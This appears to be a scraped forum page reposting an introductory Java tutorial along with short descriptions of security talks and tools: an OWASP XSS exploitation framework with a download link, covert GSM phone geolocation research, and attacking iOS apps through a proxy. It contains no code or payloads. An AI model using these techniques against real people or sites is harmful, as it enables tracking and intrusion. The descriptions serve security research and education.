workstation with the following software: Java Development Kit (JDK) Java Virtual Machine (JVM) Eclipse Juno IDE Tomcat Web Server (Required for Servlet and JSP) Notepad++ (optional) Java Framework Configurations A Java program can be built and compiled either by third-party tools, such as Eclipse Juno or Java Development Environment tools, which require some configuration on the user machine in order to run programs, while a third-party tool doesn’t. As per the open source nature of Java, such development tools are freely available from the Oracle Technology Network for Java Developers | Oracle Technology Network | Oracle website. The following segments specify the configuration of each particular tool in detail. Java Development Kit The JDK. originally called the Java Development Environment, can create and display graphical applications. The JDK consists of a library of standard classes (core Java API) and collections of utilities for building, testing, and documenting Java program. You need the core Java API to access the core functionality of the Java language. The core Java API includes underlying language constructs, as well as graphics, network, garbage collection, and file input/output capabilities. Here, the JDK utilities are outlined: [TABLE] [TR] [TD]JDK Utilities[/TD] [TD]Description[/TD] [/TR] [TR] [TD]Javac[/TD] [TD]The Java compiler converts the source code into Bytecode.[/TD] [/TR] [TR] [TD]Java[/TD] [TD]The Java interpreter executes the Java application Bytecodes.[/TD] [/TR] [TR] [TD]Javah[/TD] [TD]It generates a C header file that can be used to make a C routine that calls Java method.[/TD] [/TR] [TR] [TD]Javap[/TD] [TD]Used to dissemble Java source code. Displays accessible data and functions.[/TD] [/TR] [TR] [TD]Appletviewer[/TD] [TD]This is used to execute Java applets classes.[/TD] [/TR] [TR] [TD]Jdb[/TD] [TD]This Java debugger allows stepping through the program.[/TD] [/TR] [TR] [TD]Javadoc[/TD] [TD]Creates HTML documentation based on source code.[/TD] [/TR] [TR] [TD]Keytool[/TD] [TD]This is used for security key generation and management.[/TD] [/TR] [TR] [TD]Rmic[/TD] [TD]Create classes that support remote method invocation.[/TD] [/TR] [TR] [TD]Rmicregistry[/TD] [TD]Used to gain access to RMI objects.[/TD] [/TR] [TR] [TD]Rmid[/TD] [TD]This is used to RMI object registration.[/TD] [/TR] [TR] [TD]Serialver[/TD] [TD]This serialization utility permits versioning of persisted objects.[/TD] [/TR] [TR] [TD]Jar[/TD] [TD]Allows multiple Java classes and resources to be distributed in one compressed file.[/TD] [/TR] [TR] [TD]Jarsigner[/TD] [TD]Implement digital signing for JAR and class files.[/TD] [/TR] [TR] [TD]native2ascii[/TD] [TD]This program used to convert Unicode characters to international encoding schemes.[/TD] [/TR] [/TABLE] After installing and configuring JDK, you will see the way these tools are applied to build and run Java application, as illustrated in the following figure: First Hello World Java Program Java source code can be written with a simple text editor such as notepad. The best IDE is Eclipse Juno, which provides numerous development templates. As you can see, the following console-based Java program simply prints a “Hello world” text on the screen. The code defines a Java class called HelloWorld, which contains a single method called main(). When the Java interpreter tries to execute the HelloWorld class, it will look for a method called main(). The VM will execute this function to run the program. /* HelloWorld.java sample */ public class HelloWorld { public static void main(String[] args) { System.out.println("Hello Word!"); } } Save the file with “Helloworld.java” name somewhere on disk. Remember, the class name must be a file name with *.java extension. To compile the sample program, execute the compiler, javac, specifying the name of source file on the command prompt. The javac compiler creates a file called HelloWord.class that contains the Bytecode version of the program. To actually run the program, you must use the Java Interpreter, called java. To do so, pass the class name as a command line argument. The following figure depicts the whole life cycle of Java compilation process as: We can gather from the aforementioned sample that a Java program is first compiled and later it is interpreted. The following illustrates the various tools configuration employed during the compilation process. By adding a few comments to your Java source code, you make it possible for javadoc to automatically generate HTML documentation for you code. After adding the comments, use the javadoc command and it will make a couple of files: It is possible to examine the Bytecodes of a compiled class file and identify its accessible variable and functions. The javap utility creates a report that shows not only what functions and variables are available, but what the code actually does, although at very low level, as in the following: Java Features In this section, we will look briefly at the major characteristics that make Java such a powerful development tool. This includes cross-platform execution code support, multi-threading, security, and object-oriented features, such as: Architecture-Neutral One of the main problems facing programmers is that no guarantee exists that if you write a program today, it will run tomorrow—even on the same machine. The processor, operating system upgrades, and changes in the core system resources can make a program malfunction. Java resolves all these issues by introducing “write once, run anywhere” functionality. Object-Oriented Java is an object-oriented language: that is, it has the facility for OOPs incorporated into language. We can write reusable, extensible, and maintainable software with OOP’s support. Java supports all object-oriented mechanisms such as abstraction, inheritance, polymorphism, and encapsulation. Interpreted and High Performance Java enables the creation of cross-platform programs by compiling into an intermediate representation called Bytecode. This code can be interpreted on any system that provides a JVM. Java is specially designed to perform well on very low-power CPUs. Java Bytecodes easily translate directly into native machine code for very high-performance code by using the JIT compiler. Multi-Threading Support Java was designed to meet the real-world requirement for creating interactive network programs. To accomplish this, Java supports multithreaded programming, which allows you to write programs that do many things simultaneously. The Java run-time system comes with an elegant yet sophisticated solution for multi-process synchronization that enables you to construct smoothly running interactive systems. Distributed Applications Java is designed for the distributed environment of the Internet, because it handles TCP/IP protocols. This allows objects on two different computers to execute a procedure remotely. Java has recently revived these interfaces in a package called RMI. This feature brings a non-parallel abstraction to client-server programming. Strictly Typed Language Java programs provide robust programming by which you can restrict a few key areas to force to find your mistakes early in program design time. Java frees you from having to worry about many of the most common causes of programming errors. Because Java is a strictly typed language, it checks your code at compile time. However, it also checks your code at run time. Security Security is probably the main problem facing Internet developers. Users are typically afraid of two things: confidential information being compromised and their computer systems being corrupted or destroyed by hackers. Java’s built-in security addresses both of these concerns. Java security model has three primary components: the class loader, the Bytecode verifier, and the SecurityManager class. We will dig deeper into these concepts in later articles. Final Note This article introduced you to the history of Java, its effect on the WWW, and the underlying Java architecture. It explained the role of the Java development kit in writing program code. We have seen how to write a simple Java console application using JDK utilities such as Java, javac, javadoc, etc. Finally, we come to an understanding of why Java is so popular among the developer community by specifying its advantage over other language. After reading this article, one can easily start programming in Java. By Ajay Yadav|October 22nd, 2013 Sursa: Demystifying Java Internals (An introduction) - InfoSec Institute
  23. Owasp Xenotix Xss Exploit Framework V4.5 Video Documentation Description: OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world's 2nd largest XSS Payloads of about 1500+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes highly offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Version 4.5 Download: https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework#tab=Downloads Official Website: OWASP Xenotix XSS Exploit Framework v4.5 Relesed ‹ OpenSecurity Sursa: Owasp Xenotix Xss Exploit Framework V4.5 Video Documentation
  24. Brucon 0x05 - David Perez, Jose Pico - Geolocation Of Gsm Mobile Devices Description: Geolocation of mobile devices (MS) by the network has always been considered of interest, for example, to locate people in distress calling an emergency number, and so the GSM standard provides different location services (LCS), some network-based, and some MS-based or MS-assisted. OK, but what if a third party, without access to the network, was interested in knowing the exact position of a particular MS? Could he or she locate it? In this presentation we will show that this is indeed possible, even if the MS does not want to be found, meaning that the device has all its location services deactivated. We will demonstrate a system we designed and built for this purpose, that can be operated in any standard vehicle, and which can pinpoint the exact location of any target MS in a radius of approximately 2 kilometers around the vehicle. Yet, the main focus of the presentation will not so much be the system itself as it will be the process we followed for its design and implementation. We will describe in detail the many technical difficulties that we encountered along the way and how we tackled them. We believe this can be useful for people embarquing themselves in similar research projects. Obviously, a system like this cannot be demonstrated live in the room (it would be quite illegal), but we will show videos of the different consoles of the system, operating in different environments. For More Information please visit : - BruCON 2013 Sursa: Brucon 0x05 - David Perez, Jose Pico - Geolocation Of Gsm Mobile Devices
  25. Louisville Infosec 2013 - Attacking Ios Applications - Karl Fosaaen Description: This presentation will cover the basics of attacking iOS applications (and their back ends) using a web proxy to intercept, modify, and repeat HTTP/HTTPS requests. From setting up the proxy to pulling data from the backend systems, this talk will be a great primer for anyone interested in testing iOS applications at the HTTP protocol level. There will be a short (2 minute) primer on setting up the intercepting proxy, followed by three practical examples showing how to intercept data headed to the phone, how to modify data heading to the application server, and how to pull extra data from application servers to further an attack. All of these examples will focus on native iOS apps (Game Center and Passbook) and/or functionality (Passbook Passes). Karl is a senior security consultant at NetSPI. This role has allowed Karl to work in a variety of industries, including financial services, health care, and hardware manufacturing. Karl specializes in network and web application penetration testing. In his spare time, Karl helps out as an OPER at THOTCON and a swag goon at DEF CON. For More Information please visit : - Louisville Metro InfoSec - Theme: Mobile Security Louisville Infosec 2013 Videos Sursa: Louisville Infosec 2013 - Attacking Ios Applications - Karl Fosaaen
×
×
  • Create New...